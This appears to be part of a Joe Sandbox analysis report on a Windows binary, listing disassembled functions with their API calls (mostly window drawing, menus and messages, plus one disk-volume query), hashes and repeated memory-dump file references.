                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401016
                                                                                                                                                                                                                                                                                                • API String ID: 390680170-1597404659
                                                                                                                                                                                                                                                                                                • Opcode ID: d70c479b33c264398e28cb7ff03fea03c89dfeb31a69bd09b7f4b8d505c0b054
                                                                                                                                                                                                                                                                                                • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d70c479b33c264398e28cb7ff03fea03c89dfeb31a69bd09b7f4b8d505c0b054
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                                Function 00454160 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000,?,?,004543B4,?,00000000,00000000), ref: 004541C4
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00454215
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045421F
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045422C
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,1088D068,?,00000000,?,?,004543B4,?,00000000,00000000,?,?,?,?,?), ref: 00454273
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                                                                • String ID: \\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1177325624-259948872
                                                                                                                                                                                                                                                                                                • Opcode ID: 97f6d277518962508a84672de340e9009c68024a49f3c9384519941a69a054d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 8413255d3e20ee0171831c1fd4e9de5db1cf6cd8e0bd52f5cbead1f2af0ef7cc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f6d277518962508a84672de340e9009c68024a49f3c9384519941a69a054d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 943169B1A08310AFD310DF55D884A5BBBE8EBC9758F00492EF948D7351D6749884CB9A
                                                                                                                                                                                                                                                                                                Function 0042E730 Relevance: 10.6, APIs: 7, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                                • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                                Function 00424270 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,1088D068,75A85540,?,?,00421AA0,1088D068), ref: 004242B3
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                                • String ID: %s: %I64u $3401050$3401080
                                                                                                                                                                                                                                                                                                • API String ID: 730354411-73662114
                                                                                                                                                                                                                                                                                                • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                                Function 00421C21 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadMenuW.USER32(00000000), ref: 00421C48
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000001), ref: 00421C73
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$Load
                                                                                                                                                                                                                                                                                                • String ID: 3401014$3401015$3401098$3401131
                                                                                                                                                                                                                                                                                                • API String ID: 1099491344-459607355
                                                                                                                                                                                                                                                                                                • Opcode ID: 3daee7f433f137dee35f0ab3b345e87951239ebd58aaa073a69fa44f9e9ad44f
                                                                                                                                                                                                                                                                                                • Instruction ID: 65f7511ee5ed7a7f8c5efca7cfc7679ab30607739772d43bc8df1ff197a1c7fd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3daee7f433f137dee35f0ab3b345e87951239ebd58aaa073a69fa44f9e9ad44f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2174F1B9431076D364ABA19C03FAF72A8AF84B04F10C91FB64E725C1CEAC640157AD
                                                                                                                                                                                                                                                                                                Function 00423340 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                                • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                                • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                                • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                                • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                                Function 00432E40 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432EB2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432EF5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,-00000002,00000000), ref: 00432F33
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402077$3402078$3402079
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-670106401
                                                                                                                                                                                                                                                                                                • Opcode ID: 1e581721c84f0c249b880909b493c1dbc8988a95a366e13f64cc3adfbf7eb187
                                                                                                                                                                                                                                                                                                • Instruction ID: c04858277577f06559cf2ee2803e4bbf63125390443237cb6e41332b9df5dc51
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e581721c84f0c249b880909b493c1dbc8988a95a366e13f64cc3adfbf7eb187
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A2183B56947406BD321DF50CD86FAB73A8EB88B11F10491FF31EA25C0CAA8A804976D
                                                                                                                                                                                                                                                                                                Function 00431D10 Relevance: 9.1, APIs: 6, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00431D46
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00431D78
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431D9E
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00431DBC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00431DCA
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00431E69
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
